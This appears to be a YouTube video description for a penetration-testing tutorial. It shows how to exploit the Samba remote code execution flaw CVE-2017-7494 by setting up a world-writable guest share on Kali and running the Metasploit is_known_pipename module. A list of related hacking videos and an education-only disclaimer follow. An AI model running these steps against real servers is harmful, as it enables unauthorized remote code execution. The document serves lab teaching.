This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.
Samba since version 3.5.0 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.
Subscribe Me: https://www.youtube.com/channel/UCknKuPpCcqfcedsBhQm0NuA?sub_confirmation=1
Proof of Concept:
CVE-2017-7494 SAMBA EXPLOITATION
Vulnerable Samba Versions: 3.5.0 to 4.6.5
-- Kali 2016-2 Having 4.4.5 version of Samba
# first create one folder with full permissions
# mkdir /home/testing
#chmod 777 /home/testing
-- Create SMB client for that Directory
# vim /etc/samba/smb.config
Now search for "print$"
we Get :
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
Under this we have to mention Our folder details
comment = tester
path = /home/tester (Our Folder Path)
browsable = yes
wrietable = yes
guest ok = yes
and test That in terminal
#smbclient -L (smb machine ip)
if it show our folder detials---- Target is ready
-- In metasploit:
# search 2017
# use exploit/linux/samba/is_known_pipename
#set RHOST )TARGET LINUX IP)
# set target 3 (as linux is x86_64)(optional)
My Other Related Videos:
Whatsapp Sniffing | WhatsApp Penetration Testing
Kali 2017.1 Installation in vmware player
Kali 2017.1 Installation in Oracle VM virtualbox
Penetration Testing on windows 7 using NSA Exploit (MS17-010) | Exploiting NSA Eternalblue
Penetration Testing on windows 10 using Parrotsec Os | Exploiting window 10 with Metasploit framework
How to use Xerosploit in Kali linux
Parrot Security OS Installation
Security Auditing on linux | Vulnerability Analysis & Assessment on Kali linux
Penetration Testing Linux ftp server with Metasploit using Vsftpd Vulnerability
Penetration Testing Wi-fi wpa wpa2 Passwords using wifite
Penetration Testing on Wi-Fi WPA/WPA2 Security without Dictionary and Brute Force Attack
Network Scanning in Windows using Angry IP Scanner:
Network Scanning in Kali using Angry IP Scanner:
Tor Browser Installation in kali:
The Views/videos/knowledge here are only for education purpose.
The views/ideas/knowledge expressed here are solely of the trainer's only and nothing to do with the organization in which the trainer is currently working.
However in no circumstances neither the trainer nor the video creator is responsible for any damage or loss caused due to use or misuse of the information presented here.
If u like the video please Like the Video
if u have any doubt please comment on video...
for more education videos please subscribe the channel...
This video is only for education purpose ....